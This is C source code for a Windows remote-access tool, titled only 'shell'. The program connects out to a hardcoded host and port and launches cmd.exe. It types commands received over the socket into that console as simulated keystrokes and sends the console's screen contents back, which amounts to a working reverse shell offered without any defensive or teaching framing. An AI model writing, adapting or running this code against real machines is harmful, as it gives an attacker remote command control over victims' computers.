shell

Create by compaq

#pragma comment(lib, "ws2_32.lib")
#define _WIN32_WINNT  0x0501
#include <winsock2.h>
#include <windows.h>
#include <tchar.h>
#include <stdio.h>
#include <ws2tcpip.h>
#include <ShellAPI.h>
#include <tlhelp32.h>


int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow)
{
	WSADATA wsaData;
	struct sockaddr_in sockAddr;
	SOCKET sServer;
	int sockAddrLen;
	unsigned int i,j;
	SOCKET sClient;
	SHELLEXECUTEINFO exeInfo;

	HANDLE hStdout,hStdin,old, hNewScreenBuffer;
	SMALL_RECT srctReadRect;
	SMALL_RECT srctWriteRect;
	TCHAR  temp[10000];
	COORD coordBufSize;
	COORD coordBufCoord;
	COORD pos = {0,0};
	COORD pos1;
	CHAR_INFO done[160];
	SMALL_RECT srctWindow;
	struct addrinfo *result, hints;
	unsigned char url[100] = {"localhost"},port[10] = {"4444"};
	char temp1[10000];
	unsigned char temp2[200];
	TCHAR file[50] = {TEXT("C:\\windows\\system32\\cmd.exe")};
	CONSOLE_SCREEN_BUFFER_INFO csbiInfo;
	DWORD bot,bot1;
	DWORD dwTmp;
    INPUT_RECORD ir[200];
	DWORD len;
		HANDLE hModuleSnap = INVALID_HANDLE_VALUE;
  MODULEENTRY32 me32;

 HANDLE hProcessSnap;
  HANDLE hProcess;
  PROCESSENTRY32 pe32;


	 WSAStartup(MAKEWORD(2,2), &wsaData);


	     ZeroMemory(&hints, sizeof (hints));
	     hints.ai_family = AF_INET;
        hints.ai_socktype = SOCK_STREAM;
        hints.ai_protocol = IPPROTO_TCP;
        hints.ai_flags = AI_PASSIVE;

        // Resolve the local address and port to be used by the server
        getaddrinfo("localhost","4444", &hints, &result);

        sClient = socket(result->ai_family, result->ai_socktype, result->ai_protocol);

		connect(sClient,result->ai_addr, (int)result->ai_addrlen);

	exeInfo.cbSize = sizeof(exeInfo);
		exeInfo.fMask = 0;
		exeInfo.hwnd = 0;
		exeInfo.lpVerb = 0;
		exeInfo.lpFile = TEXT("C:\\windows\\system32\\cmd.exe");
		exeInfo.lpParameters = 0;
		exeInfo.lpDirectory = 0;
		exeInfo.nShow = SW_SHOW;
		exeInfo.hInstApp = 0;
		ShellExecuteEx(&exeInfo);


	hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );

	pe32.dwSize = sizeof( PROCESSENTRY32 );

	Process32First( hProcessSnap, &pe32 );


		do {
			hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID );
			memcpy(temp,pe32.szExeFile,20);
			if(temp[0] == 'c' && temp[2] == 'm' && temp[4] == 'd' && temp[6] == '.') goto outer;
		} while( Process32Next( hProcessSnap, &pe32 ) );

		outer:


	AttachConsole(pe32.th32ProcessID);
	hStdin = GetStdHandle(STD_INPUT_HANDLE);
	hStdout = GetStdHandle(STD_OUTPUT_HANDLE);

	GetConsoleScreenBufferInfo(hStdout,&csbiInfo);
	pos.X = 0;
	pos.Y = csbiInfo.srWindow.Bottom-80;

	ReadConsoleOutputCharacter(hStdout,temp,6480,pos,&len);

for(;;) {
	memset(temp1,0x00,sizeof(temp1));
	memset(temp2,0x00,sizeof(temp2));
	recv(sClient,temp1,100,0);
	for(i=0;i<100;i++) {
		temp2[i] = temp1[i];
	}
	if(temp2[0] == 'e' && temp2[1] == 'x' && temp2[2] == 'i' && temp2[3] == 't') goto pl;
	for(i=0;i<100;i++) {
		if(temp2[i] == 0x00) {
			j=i;
			goto next;
		}
		ir[i].EventType = KEY_EVENT;
		ir[i].Event.KeyEvent.bKeyDown = TRUE;
		ir[i].Event.KeyEvent.dwControlKeyState = 0;
		ir[i].Event.KeyEvent.uChar.UnicodeChar = temp2[i];
		ir[i].Event.KeyEvent.wRepeatCount = 1;
	}
	next:
    ir[i].EventType = KEY_EVENT;
    ir[i].Event.KeyEvent.bKeyDown = TRUE;
    ir[i].Event.KeyEvent.dwControlKeyState = 0;
    ir[i].Event.KeyEvent.uChar.UnicodeChar = VK_RETURN;
    ir[i].Event.KeyEvent.wRepeatCount = 1;

    dwTmp = 0;
    WriteConsoleInput(hStdin, ir, j+1, &dwTmp);

	Sleep(3000);
	GetConsoleScreenBufferInfo(hStdout,&csbiInfo);

	pos.X = 0;
	pos.Y = csbiInfo.srWindow.Bottom-80;
	ReadConsoleOutputCharacter(hStdout,temp,6480,pos,&len);


	for(i=0;i<6480;i++) {
		temp1[i] = temp[i];
	}
	send(sClient,temp1,6480,0);
}
		pl:
		SetConsoleActiveScreenBuffer(old);


	    return 0;
}